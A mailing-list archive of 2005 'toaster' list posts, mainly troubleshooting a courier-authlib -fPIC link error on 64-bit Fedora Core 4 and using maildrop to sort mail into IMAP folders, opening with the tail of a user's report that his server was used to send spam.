ipt; if someone would like a copy I can e-mail it, or if an operator thinks it fine I will... That dc.txt was a looong list of e-mail addresses. As is lista-10.txt. Granted I'm not a very experienced linux user (PC's for 10 or so years, Linux for only a few), but I have been following security bulletins and best practice everywhere, changing root passwords, no shell accounts etc. and I didn't think my system was too insecure. On a bright side, it was a good little "stress test" to see the system hold up under 40,000+ e-mails on our connection. On a down side, potential recipients of such an e-mail attack are not going to see things that way Any help anybody can provide in diagnosing this intrusion and/or preventing it would be greatly appreciated. I will hold off on any more detail to try to keep this e-mail under the length of an encyclopaedia. Regards, David
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
> -Original Message- > From: Bill Shupp [mailto:[EMAIL PROTECTED] > Sent: Friday, 30 December 2005 5:31 AM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > David wrote: > >>Do you get that error when using --without-authmysql? > > > > > > configuring courier-authlib-0.58 I do: > > > > ]# ./configure --with-redhat --without-authmysql > > > > then I make with: > > > > ]# gmake > > > > Which gives: > > > > > > > > Linking libauthvchkpw.la > > /usr/bin/ld: /home/vpopmail/lib/libvpopmail.a(vpopmail.o): relocation > > R_X86_64_32S against `a local symbol' can not be used when > making a shared > > object; recompile with -fPIC > > /home/vpopmail/lib/libvpopmail.a: could not read symbols: Bad value > > collect2: ld returned 1 exit status > > gmake[2]: *** [libauthvchkpw.la] Error 1 > > gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > > gmake[1]: *** [all-recursive] Error 1 > > gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > > gmake: *** [all] Error 2 > > > > I have vpopmail-5.4.10 compiled with the > > > > libvpopmail_a_CFLAGS = -fPIC > > > > patch applied (manually) to Makefile.am > > > > I just noticed, however, that it is possible that doing a > ./configure for > > vpopmail removes this line from Makefile.am, and that a > subsequent make is > > unaffected? > > > > I don't know, will keep experimenting. > > Before compiling courier-authlib, try: > > export CFLAGS=" -fPIC" > > to set the environment. Unfortunately I get the same result: Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 When I try that. Thanks, David > Regards, > > Bill > > !DSPAM:43b43274139691476250465! > >
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
> -Original Message- > From: Tom Collins [mailto:[EMAIL PROTECTED] > Sent: Friday, 30 December 2005 1:55 AM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > On Dec 28, 2005, at 7:45 PM, David wrote: > > Linking libauthmysql.la > > /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation > > R_X86_64_32 > > against `a local symbol' can not be used when making a shared object; > > recompile with -fPIC > > /usr/lib/libmysqlclient.a: could not read symbols: Bad value > > When you configure courier-imap, you shouldn't enable the authmysql > module. This error has nothing to do with vpopmail. > > Do you get that error when using --without-authmysql? configuring courier-authlib-0.58 I do: ]# ./configure --with-redhat --without-authmysql then I make with: ]# gmake Which gives: Linking libauthvchkpw.la /usr/bin/ld: /home/vpopmail/lib/libvpopmail.a(vpopmail.o): relocation R_X86_64_32S against `a local symbol' can not be used when making a shared object; recompile with -fPIC /home/vpopmail/lib/libvpopmail.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthvchkpw.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 I have vpopmail-5.4.10 compiled with the libvpopmail_a_CFLAGS = -fPIC patch applied (manually) to Makefile.am I just noticed, however, that it is possible that doing a ./configure for vpopmail removes this line from Makefile.am, and that a subsequent make is unaffected? I don't know, will keep experimenting. Regards, David > -- > Tom Collins - [EMAIL PROTECTED] > QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ > You don't need a laptop to troubleshoot high-speed Internet: > sniffter.com > > > !DSPAM:43b3fff769108272017845! > >
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
> -Original Message- > From: Bill Shupp [mailto:[EMAIL PROTECTED] > Sent: Thursday, 29 December 2005 2:36 PM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > David wrote: > > Thanks Tom, I applied that line manually to Makefile.am in the vpopmail > > 5.4.10 source. Unfortunately I still get the same error on gmake of > > courier-authlib: > > > > Linking libauthmysql.la > > /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation > R_X86_64_32 > > against `a local symbol' can not be used when making a shared object; > > recompile with -fPIC > > /usr/lib/libmysqlclient.a: could not read symbols: Bad value > > > > Is this really caused by vpopmail and not something in courier-authlib? > > > > Thanks for your help, > > > > David > > > > Try doing a "gmake distclean" on courier-authlib, then reconfiguring > before trying to compile it. > > Regards, > > Bill Thanks Bill - a good idea... but unfortunately same result. I guess everything needs to be compiled with -fPIC for AMD64 (I don't know why), and the only mysql libraries I have installed are compiled with that switch (in the release notes for the latest mysql version - 5.0.17-1). Strange thing is that I was successfully able to compile on AMD64 with Fedora Core 3. So any hints on where I should hunt for the solution? Is this a problem with courier-authlib? If so, a courier list perhaps? Thanks, David
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
Thanks Tom, I applied that line manually to Makefile.am in the vpopmail 5.4.10 source. Unfortunately I still get the same error on gmake of courier-authlib: Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value Is this really caused by vpopmail and not something in courier-authlib? Thanks for your help, David > -Original Message- > From: Tom Collins [mailto:[EMAIL PROTECTED] > Sent: Thursday, 29 December 2005 11:45 AM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > On Dec 28, 2005, at 11:04 AM, David wrote: > > I unfortunately cannot apply the patch > > to the included version of vpopmail 5.4.10 either - I receive: > > > > patching file Makefile.am > > Hunk #1 FAILED at 18. > > 1 out of 1 hunk FAILED -- saving rejects to file Makefile.am.rej > > Then apply it manually. Look in the file for this line: > > libvpopmail_a_LIBADD = cdb/*.o > > And add this line after it: > > libvpopmail_a_CFLAGS = -fPIC > > make clean; ./configure (with your options); make; make install > > -- > Tom Collins - [EMAIL PROTECTED] > QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ > You don't need a laptop to troubleshoot high-speed Internet: > sniffter.com > > > !DSPAM:43b33893168177634914536! > >
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
Still no luck; I have tried configuring courier-authlib with --without-authmysql and --with-redhat but I just get: Linking libauthvchkpw.la /usr/bin/ld: /home/vpopmail/lib/libvpopmail.a(vpopmail.o): relocation R_X86_64_32S against `a local symbol' can not be used when making a shared object; recompile with -fPIC /home/vpopmail/lib/libvpopmail.a: could not read symbols: Bad value when I try to gmake couier-authlib. I unfortunately cannot apply the patch to the included version of vpopmail 5.4.10 either - I receive: patching file Makefile.am Hunk #1 FAILED at 18. 1 out of 1 hunk FAILED -- saving rejects to file Makefile.am.rej I have x86_64 RPM (generic) versions of mysql 5.0.17-1 installed (the latest off the mysql site). So, unfortunately, it looks like it is not possible to install the Shupp toaster on FC4 with x86_64 architecture at this stage? This is a pity... I will have to swap back to a 32-bit platform, which I am dreading. Lots of downtime... :) If anybody has success in getting the toaster compiled (and specifically courier-authlib) with Fedora Core 4 on an AMD64 system could you please let me or the list know! I would be very interested to know how you did it. Thanks again for your help Tom, David > -Original Message- > From: Tom Collins [mailto:[EMAIL PROTECTED] > Sent: Thursday, 29 December 2005 4:50 AM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > On Dec 28, 2005, at 8:35 AM, David wrote: > > Thanks Tom! Also I notice that version 5.4.13 is available under the > > stable > > releases on SourceForge, and it says it includes the -fPIC option. > > However > > it doesn't solve my problem; and I have the latest mysql version > > (5.0.17 > > generic rpm) installed which is apparrently compiled with the -fPIC > > option > > but it still errors with > > > > "Linking libauthmysql.la > > /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation > > R_X86_64_32 > > against `a local symbol' can not be used when making a shared object; > > recompile with -fPIC > > /usr/lib/libmysqlclient.a: could not read symbols: Bad value" > > > > when I do a gmake in courier-authlib-0.58 > > > > Patching vpopmail with this patch didn't solve my problem... but > > surely my > > error is with courier-authlib? Thanks for your help, > > I think that libauthmysql is a part of courier-imap, and it shouldn't > be necessary for your system. Courier-IMAP only needs the authvchkpw > module in order to do authentication. I'm not familiar enough with > courier-imap to know how to tell it which modules to compile. > > > I have been researching some more and now I am a little confused about > > the > > vpopmail relationship... could you tell me where/how I need to apply > > this > > patch? Will patching vpopmail really help my courier-authlib compile > > problem? > > The patch applies to vpopmail's Makefile.am. The make system should > rebuild Makefile.in from the Makefile.am. After you rebuild and > reinstall vpopmail, libvpopmail should be compiled with the -fPIC > option. > > -- > Tom Collins - [EMAIL PROTECTED] > QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ > You don't need a laptop to troubleshoot high-speed Internet: > sniffter.com > > > !DSPAM:43b2d74d65701156784085! > >
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
I have been researching some more and now I am a little confused about the vpopmail relationship... could you tell me where/how I need to apply this patch? Will patching vpopmail really help my courier-authlib compile problem? David > -Original Message- > From: Tom Collins [mailto:[EMAIL PROTECTED] > Sent: Wednesday, 28 December 2005 4:34 PM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > I think it's something about the new courier-imap that requires > libvpopmail to be compiled with the -fPIC option. > > Here's a patch you can apply to 5.4.10: > > Index: Makefile.am > === > RCS file: /cvsroot/vpopmail/vpopmail/Makefile.am,v > retrieving revision 1.17.2.2 > retrieving revision 1.17.2.3 > diff -u -d -r1.17.2.2 -r1.17.2.3 > --- Makefile.am 16 Dec 2004 16:07:48 - 1.17.2.2 > +++ Makefile.am 2 Sep 2005 18:59:14 - 1.17.2.3 > @@ -18,6 +18,7 @@ > > libvpopmail_a_SOURCES=$(COMMONSOURCES) > libvpopmail_a_LIBADD = cdb/*.o > +libvpopmail_a_CFLAGS = -fPIC > > [EMAIL PROTECTED]@/bin > vpopmailbin_PROGRAMS = vchkpw vdelivermail clearopensmtp vadddomain \ > > -Tom > > On Dec 27, 2005, at 6:04 PM, David wrote: > > Just thought I'd add that the previous version toaster compiled fine > > on FC3 > > on x86_64 (AMD Athlon 64). > > > > David > > > >> -Original Message- > >> From: David [mailto:[EMAIL PROTECTED] > >> Sent: Wednesday, 28 December 2005 11:37 AM > >> To: toaster@shupp.org > >> Subject: RE: [toaster] courier-authlib gmake problem with FC4 on > >> x86_64 > >> > >> > >> No it's 5.4.10... but this seems to be a problem with compiling > >> courier-authlib with libauthmysql.la? Would using vpopmail 5.4.13 > >> fix that? > >> > >> Thanks, > >> > >> David > >> > >>> -Original Message- > >>> From: Tom Collins [mailto:[EMAIL PROTECTED] > >>> Sent: Wednesday, 28 December 2005 7:47 AM > >>> To: toaster@shupp.org > >>> Subject: Re: [toaster] courier-authlib gmake problem with FC4 on > >>> x86_64 > >>> > >>> > >>> Does the toaster use vpopmail 5.4.13? That's where we added the > >>> -fPIC > >>> option when compiling libvpopmail. > >>> > >>> On Dec 27, 2005, at 11:18 AM, David Branford wrote: > >>>> Appologies - I didn't proof-read properly. "...appears to be a > >>>> similar > >>>> problem to _..." should include a link to a message which I thought > >>>> discussed a similar problem. Here it is: > >>>> > >>>> http://www.mail-archive.com/toaster@shupp.org/msg02976.html > >>>> > >>>> David > >>>> > >>>>> Hi list, > >>>>> > >>>>> I'm encountering what appears to be a similar problem to _ when I > >>>>> get > >>>>> the > >>>>> the courier-imap stage of the toaster install. The following is a > >>>>> tail of > >>>>> the output of the gmake command run right after a successful > >>>>> ./configure > >>>>> --with-redhat (system is a 64-bit AMD system running FC4_x86_64): > >>>>> > >>>>> > >>>>> > >>>>> Linking libauthldap.la > >>>>> Compiling authmysql.c > >>>>> Compiling preauthmysql.c > >>>>> Compiling authmysqllib.c > >>>>> Linking libauthmysql.la > >>>>> /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation > >>>>> R_X86_64_32 > >>>>> against `a local symbol' can not be used when making a shared > >>>>> object; > >>>>> recompile with -fPIC > >>>>> /usr/lib/libmysqlclient.a: could not read symbols: Bad value > >>>>> collect2: ld returned 1 exit status > >>>>> gmake[2]: *** [libauthmysql.la] Error 1 > >>>>> gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > >>>>> gmake[1]: *** [all-recursive] Error 1 > >>>>> gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > >>>>> gmake: *** [all] Error 2 > >>>>> > >>>>> > >>>>> > >>>>> Looks like > >>>>> http://sourceforge.net/mailarchive/forum.php? > >>>>> thread_id=8106414&forum_id=35252 > >>>>> is a similar error. I am using the most recent version of the > >>>>> toaster > >>>>> as > >>>>> of 28-12-2005 from shupp.org/toaster > >>>>> > >>>>> Can anybody suggest another way around this perhaps? I don't want > >>>>> to > >>>>> have > >>>>> to install a 32-bit OS just to get courier-authlib working! However > >>>>> that's > >>>>> a rather essential component... > >>>>> > >>>>> Regards, > >>>>> David > >>>>> > >>>>> > >>>>> > >>>>> > >>>>> > >>>> > > > !DSPAM:43b22ad4203142343143565! > >
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
Thanks Tom! Also I notice that version 5.4.13 is available under the stable releases on SourceForge, and it says it includes the -fPIC option. However it doesn't solve my problem; and I have the latest mysql version (5.0.17 generic rpm) installed which is apparrently compiled with the -fPIC option but it still errors with "Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value" when I do a gmake in courier-authlib-0.58 Patching vpopmail with this patch didn't solve my problem... but surely my error is with courier-authlib? Thanks for your help, David > -Original Message- > From: Tom Collins [mailto:[EMAIL PROTECTED] > Sent: Wednesday, 28 December 2005 4:34 PM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > I think it's something about the new courier-imap that requires > libvpopmail to be compiled with the -fPIC option. > > Here's a patch you can apply to 5.4.10: > > Index: Makefile.am > === > RCS file: /cvsroot/vpopmail/vpopmail/Makefile.am,v > retrieving revision 1.17.2.2 > retrieving revision 1.17.2.3 > diff -u -d -r1.17.2.2 -r1.17.2.3 > --- Makefile.am 16 Dec 2004 16:07:48 - 1.17.2.2 > +++ Makefile.am 2 Sep 2005 18:59:14 - 1.17.2.3 > @@ -18,6 +18,7 @@ > > libvpopmail_a_SOURCES=$(COMMONSOURCES) > libvpopmail_a_LIBADD = cdb/*.o > +libvpopmail_a_CFLAGS = -fPIC > > [EMAIL PROTECTED]@/bin > vpopmailbin_PROGRAMS = vchkpw vdelivermail clearopensmtp vadddomain \ > > -Tom > > On Dec 27, 2005, at 6:04 PM, David wrote: > > Just thought I'd add that the previous version toaster compiled fine > > on FC3 > > on x86_64 (AMD Athlon 64). > > > > David > > > >> -Original Message- > >> From: David [mailto:[EMAIL PROTECTED] > >> Sent: Wednesday, 28 December 2005 11:37 AM > >> To: toaster@shupp.org > >> Subject: RE: [toaster] courier-authlib gmake problem with FC4 on > >> x86_64 > >> > >> > >> No it's 5.4.10... but this seems to be a problem with compiling > >> courier-authlib with libauthmysql.la? Would using vpopmail 5.4.13 > >> fix that? > >> > >> Thanks, > >> > >> David > >> > >>> -Original Message- > >>> From: Tom Collins [mailto:[EMAIL PROTECTED] > >>> Sent: Wednesday, 28 December 2005 7:47 AM > >>> To: toaster@shupp.org > >>> Subject: Re: [toaster] courier-authlib gmake problem with FC4 on > >>> x86_64 > >>> > >>> > >>> Does the toaster use vpopmail 5.4.13? That's where we added the > >>> -fPIC > >>> option when compiling libvpopmail. > >>> > >>> On Dec 27, 2005, at 11:18 AM, David Branford wrote: > >>>> Appologies - I didn't proof-read properly. "...appears to be a > >>>> similar > >>>> problem to _..." should include a link to a message which I thought > >>>> discussed a similar problem. Here it is: > >>>> > >>>> http://www.mail-archive.com/toaster@shupp.org/msg02976.html > >>>> > >>>> David > >>>> > >>>>> Hi list, > >>>>> > >>>>> I'm encountering what appears to be a similar problem to _ when I > >>>>> get > >>>>> the > >>>>> the courier-imap stage of the toaster install. The following is a > >>>>> tail of > >>>>> the output of the gmake command run right after a successful > >>>>> ./configure > >>>>> --with-redhat (system is a 64-bit AMD system running FC4_x86_64): > >>>>> > >>>>> > >>>>> > >>>>> Linking libauthldap.la > >>>>> Compiling authmysql.c > >>>>> Compiling preauthmysql.c > >>>>> Compiling authmysqllib.c > >>>>> Linking libauthmysql.la > >>>>> /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation > >>>>> R_X86_64_32 > >>>>> against `a local symbol' can not be used when making a shared > >>>>> object; > >>>>> recompile with -fPIC > >>>>> /usr/lib/libmysqlclient.a: could not read symbols: Bad value > >>>>> collect2: ld returned 1 exit status > >>>>> gmake[2]: *** [libauthmysql.la] Error 1 > >>>>> gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > >>>>> gmake[1]: *** [all-recursive] Error 1 > >>>>> gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > >>>>> gmake: *** [all] Error 2 > >>>>> > >>>>> > >>>>> > >>>>> Looks like > >>>>> http://sourceforge.net/mailarchive/forum.php? > >>>>> thread_id=8106414&forum_id=35252 > >>>>> is a similar error. I am using the most recent version of the > >>>>> toaster > >>>>> as > >>>>> of 28-12-2005 from shupp.org/toaster > >>>>> > >>>>> Can anybody suggest another way around this perhaps? I don't want > >>>>> to > >>>>> have > >>>>> to install a 32-bit OS just to get courier-authlib working! However > >>>>> that's > >>>>> a rather essential component... > >>>>> > >>>>> Regards, > >>>>> David > >>>>> > >>>>> > >>>>> > >>>>> > >>>>> > >>>> > > > !DSPAM:43b22ad4203142343143565! > >
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
Just thought I'd add that the previous version toaster compiled fine on FC3 on x86_64 (AMD Athlon 64). David > -Original Message- > From: David [mailto:[EMAIL PROTECTED] > Sent: Wednesday, 28 December 2005 11:37 AM > To: toaster@shupp.org > Subject: RE: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > No it's 5.4.10... but this seems to be a problem with compiling > courier-authlib with libauthmysql.la? Would using vpopmail 5.4.13 > fix that? > > Thanks, > > David > > > -Original Message- > > From: Tom Collins [mailto:[EMAIL PROTECTED] > > Sent: Wednesday, 28 December 2005 7:47 AM > > To: toaster@shupp.org > > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > > > > Does the toaster use vpopmail 5.4.13? That's where we added the -fPIC > > option when compiling libvpopmail. > > > > On Dec 27, 2005, at 11:18 AM, David Branford wrote: > > > Appologies - I didn't proof-read properly. "...appears to be a similar > > > problem to _..." should include a link to a message which I thought > > > discussed a similar problem. Here it is: > > > > > > http://www.mail-archive.com/toaster@shupp.org/msg02976.html > > > > > > David > > > > > >> Hi list, > > >> > > >> I'm encountering what appears to be a similar problem to _ when I get > > >> the > > >> the courier-imap stage of the toaster install. The following is a > > >> tail of > > >> the output of the gmake command run right after a successful > > >> ./configure > > >> --with-redhat (system is a 64-bit AMD system running FC4_x86_64): > > >> > > >> > > >> > > >> Linking libauthldap.la > > >> Compiling authmysql.c > > >> Compiling preauthmysql.c > > >> Compiling authmysqllib.c > > >> Linking libauthmysql.la > > >> /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation > > >> R_X86_64_32 > > >> against `a local symbol' can not be used when making a shared object; > > >> recompile with -fPIC > > >> /usr/lib/libmysqlclient.a: could not read symbols: Bad value > > >> collect2: ld returned 1 exit status > > >> gmake[2]: *** [libauthmysql.la] Error 1 > > >> gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > > >> gmake[1]: *** [all-recursive] Error 1 > > >> gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > > >> gmake: *** [all] Error 2 > > >> > > >> > > >> > > >> Looks like > > >> http://sourceforge.net/mailarchive/forum.php? > > >> thread_id=8106414&forum_id=35252 > > >> is a similar error. I am using the most recent version of the toaster > > >> as > > >> of 28-12-2005 from shupp.org/toaster > > >> > > >> Can anybody suggest another way around this perhaps? I don't want to > > >> have > > >> to install a 32-bit OS just to get courier-authlib working! However > > >> that's > > >> a rather essential component... > > >> > > >> Regards, > > >> David > > >> > > >> > > >> > > >> > > >> > > > > > > > > > > > > > > Tom Collins > > Tom Logic LLC > > PO Box 5717 > > Napa, CA 94581 > > (707) 265-6622 > > (707) 265-6646 fax > > [EMAIL PROTECTED] > > > > > > > > > > > > > > !DSPAM:43b1e555133826854916318! > >
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
No it's 5.4.10... but this seems to be a problem with compiling courier-authlib with libauthmysql.la? Would using vpopmail 5.4.13 fix that? Thanks, David > -Original Message- > From: Tom Collins [mailto:[EMAIL PROTECTED] > Sent: Wednesday, 28 December 2005 7:47 AM > To: toaster@shupp.org > Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 > > > Does the toaster use vpopmail 5.4.13? That's where we added the -fPIC > option when compiling libvpopmail. > > On Dec 27, 2005, at 11:18 AM, David Branford wrote: > > Appologies - I didn't proof-read properly. "...appears to be a similar > > problem to _..." should include a link to a message which I thought > > discussed a similar problem. Here it is: > > > > http://www.mail-archive.com/toaster@shupp.org/msg02976.html > > > > David > > > >> Hi list, > >> > >> I'm encountering what appears to be a similar problem to _ when I get > >> the > >> the courier-imap stage of the toaster install. The following is a > >> tail of > >> the output of the gmake command run right after a successful > >> ./configure > >> --with-redhat (system is a 64-bit AMD system running FC4_x86_64): > >> > >> > >> > >> Linking libauthldap.la > >> Compiling authmysql.c > >> Compiling preauthmysql.c > >> Compiling authmysqllib.c > >> Linking libauthmysql.la > >> /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation > >> R_X86_64_32 > >> against `a local symbol' can not be used when making a shared object; > >> recompile with -fPIC > >> /usr/lib/libmysqlclient.a: could not read symbols: Bad value > >> collect2: ld returned 1 exit status > >> gmake[2]: *** [libauthmysql.la] Error 1 > >> gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > >> gmake[1]: *** [all-recursive] Error 1 > >> gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > >> gmake: *** [all] Error 2 > >> > >> > >> > >> Looks like > >> http://sourceforge.net/mailarchive/forum.php? > >> thread_id=8106414&forum_id=35252 > >> is a similar error. I am using the most recent version of the toaster > >> as > >> of 28-12-2005 from shupp.org/toaster > >> > >> Can anybody suggest another way around this perhaps? I don't want to > >> have > >> to install a 32-bit OS just to get courier-authlib working! However > >> that's > >> a rather essential component... > >> > >> Regards, > >> David > >> > >> > >> > >> > >> > > > > > > > > > Tom Collins > Tom Logic LLC > PO Box 5717 > Napa, CA 94581 > (707) 265-6622 > (707) 265-6646 fax > [EMAIL PROTECTED] > > > !DSPAM:43b1af6282309550112723! > >
Re: [toaster] courier-authlib gmake problem with FC4 on x86_64
Appologies - I didn't proof-read properly. "...appears to be a similar problem to _..." should include a link to a message which I thought discussed a similar problem. Here it is: http://www.mail-archive.com/toaster@shupp.org/msg02976.html David > Hi list, > > I'm encountering what appears to be a similar problem to _ when I get the > the courier-imap stage of the toaster install. The following is a tail of > the output of the gmake command run right after a successful ./configure > --with-redhat (system is a 64-bit AMD system running FC4_x86_64): > > > > Linking libauthldap.la > Compiling authmysql.c > Compiling preauthmysql.c > Compiling authmysqllib.c > Linking libauthmysql.la > /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 > against `a local symbol' can not be used when making a shared object; > recompile with -fPIC > /usr/lib/libmysqlclient.a: could not read symbols: Bad value > collect2: ld returned 1 exit status > gmake[2]: *** [libauthmysql.la] Error 1 > gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > gmake[1]: *** [all-recursive] Error 1 > gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' > gmake: *** [all] Error 2 > > > > Looks like > http://sourceforge.net/mailarchive/forum.php?thread_id=8106414&forum_id=35252 > is a similar error. I am using the most recent version of the toaster as > of 28-12-2005 from shupp.org/toaster > > Can anybody suggest another way around this perhaps? I don't want to have > to install a 32-bit OS just to get courier-authlib working! However that's > a rather essential component... > > Regards, > David > > > !DSPAM:43b1926f53901391220585! > >
[toaster] courier-authlib gmake problem with FC4 on x86_64
Hi list, I'm encountering what appears to be a similar problem to _ when I get the the courier-imap stage of the toaster install. The following is a tail of the output of the gmake command run right after a successful ./configure --with-redhat (system is a 64-bit AMD system running FC4_x86_64): Linking libauthldap.la Compiling authmysql.c Compiling preauthmysql.c Compiling authmysqllib.c Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 Looks like http://sourceforge.net/mailarchive/forum.php?thread_id=8106414&forum_id=35252 is a similar error. I am using the most recent version of the toaster as of 28-12-2005 from shupp.org/toaster Can anybody suggest another way around this perhaps? I don't want to have to install a 32-bit OS just to get courier-authlib working! However that's a rather essential component... Regards, David
RE: [toaster] Sorting mail
Well I've tried out q-sorter, and I haven't had much luck; it seems it
always errors out when it tries to open an imap transaction in php.
But I have put some thought into it and wonder if someone could
correct/confirm my logical process here:
I have read that maildrop is actually compiled into courier-imap. I know
that courier also does server-side filtering, which at first glance would
seem the ideal way to handle my situation. However I am *guessing* that said
server-side filtering would have to take place inside an imap transaction
(ie. send imap commands to sort the mail) and, since courier is not my local
delivery agent, would have the effect that I would be left with lots of
deleted mail in my inbox (because imap cannot move mail, only copy it to
another folder and delete the copy that was in the inbox, leaving a "snail
trail" of deleted mail that needs to be "purged"; another imap feature).
So, I now think that using an externally-compiled copy of the latest version
of maildrop as my local delivery agent can yield the best results for me, as
it is able to decide which folder to put mail into and it doesn't leave a
"snail trail" of deleted mail in my inbox. My mailfilter file for maildrop
simply imports my environment variables:
import EXT
import HOST
import SIZE
import RECIPIENT
import HOME
and then does something like:
exception {
to "$VMAILDIR/.myfolder.mysubfolder"
}
to handle "sorted" mail delivery, or just:
exception {
to "$VMAILDIR"
}
to handle a normal delivery. Can anyone tell me if I am going down the right
path here?
Thanks,
David.
> -Original Message-
> From: David [mailto:[EMAIL PROTECTED]
> Sent: Sunday, 25 September 2005 2:23 AM
> To: toaster@shupp.org
> Subject: RE: [toaster] Sorting mail
>
>
> Thanks all - that's a few really useful suggestions; I will try procmail &
> "q-sorter" (which I absolutely had not heard of before but looks very
> interesting) - and reply again with my success (if any :) )
>
> Regards,
>
> David.
>
> > -Original Message-
> > From: Aleksander Olsen [mailto:[EMAIL PROTECTED]
> > Sent: Saturday, 24 September 2005 5:10 AM
> > To: toaster@shupp.org
> > Subject: Re: [toaster] Sorting mail
> >
> >
> > http://q-sorter.sourceforge.net
> >
> > On 9/23/05, Bill Shupp <[EMAIL PROTECTED]> wrote:
> > > David wrote:
> > > > Hi all,
> > > >
> > > > The Shupp toaster is an extremely neat package, and I have
> > been using it for
> > > > over 12 months now on several boxes.
> > > >
> > > > I have found IMAP to be extremely useful to handle a large
> > amount of e-mail,
> > > > including archived messages, accross several MUA's including webmail
> > > > (squirrelmail).
> > > >
> > > > But one feature I'm desperately lacking is the ability to
> > sort mail into
> > > > IMAP folders based on simple rules (eg. sender or subject). I
> > don't need
> > > > complex filtering, which various packages provide (eg.
> > procmail) but I *do*
> > > > need the ability to move mail into different folders based on filter
> > > > settings.
> > > >
> > > > Knowing that I will have to integrate this with qmail &
> > courier as well, I
> > > > thought I'd ask here first. Does anyone has anything going
> > like this? Does
> > > > anyone have any suggestions for what I should try?
> > > >
> > > > I have looked at procmail, sieve, and maildrop, but I haven't
> > figured out
> > > > any way of getting those programs to actually *move* my mail
> > into different
> > > > folders; they seem to be "accept or reject" only...
> > >
> > > maildrop is what you want. www.courier-mta.org.
> > >
> > > Regards,
> > >
> > > Bill
> > >
> >
> >
> >
> >
>
>
>
> !DSPAM:43358480305875132648303!
>
>
RE: [toaster] Sorting mail
